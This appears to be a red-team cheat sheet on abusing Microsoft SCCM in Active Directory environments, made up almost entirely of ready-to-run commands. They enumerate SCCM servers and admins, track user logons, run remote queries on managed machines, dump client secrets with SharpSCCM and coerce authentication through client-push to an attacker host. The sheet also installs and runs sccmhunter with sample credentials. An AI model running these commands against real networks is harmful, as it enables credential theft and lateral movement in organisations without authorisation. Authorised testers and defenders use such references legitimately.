SCCM Abuse
System Center Configuration Manager / Microsoft Endpoint Configuration Manager
Enumeration
Look for CcmExec.exe processes:
Cmd > tasklist | findstr CcmExec
Search for SCCM servers in LDAP:
PV3 > Get-DomainComputer -LDAPFilter "(&(objectClass=computer)(cn=*sccm*))" | select -ExpandProperty dnsHostName
PV3 > Get-DomainComputer | ? {$_.Name -like "*sccm*"} | select -ExpandProperty dnsHostName
VNC-like Remote Control (CmRcViewer Abuse)
Tools
MalSCCM
sccmwtf
SharpSCCM
Get SMS (Systems Management Server) and SC (Site Code):
Cmd > SharpSCCM.exe local site-info
List SCCM admins:
Cmd > SharpSCCM.exe get admins -sms <SMS> -sc <SC>
List user latest logons (automated in sccmhound):
Cmd > SharpSCCM.exe get class-instances -sms <SMS> -sc <SC> SMS_R_System -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -w "LastLogonUserName LIKE '%snovvcrash%'"
Cmd > SharpSCCM.exe get devices -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -u <USER>
Get resource (server) ID:
Cmd > SharpSCCM.exe get resource-id -sms <SMS> -sc <SC> -d <RESOURCE>
Execute WMI command on a resource:
Cmd > SharpSCCM.exe invoke admin-service -sms <SMS> -sc <SC> -q "EventLog('Security',4h) | where EventID == 4624 | order by DateTime desc" -r <ID>
Grab secrets from SCCM client (locally):
Cmd > SharpSCCM.exe local secrets -m disk
Coerce authentication from SCCM server (remotely):
Cmd > SharpSCCM.exe invoke client-push -t attacker.local
sccmhunter
Install:
$ pipx install -f "git+https://github.com/garrettfoster13/sccmhunter.git"
List user latest logons:
$ sccmhunter.py admin -u sccm_admin -p 'Passw0rd!' -ip SCCM.megacorp.local
$ get_lastlogon administrator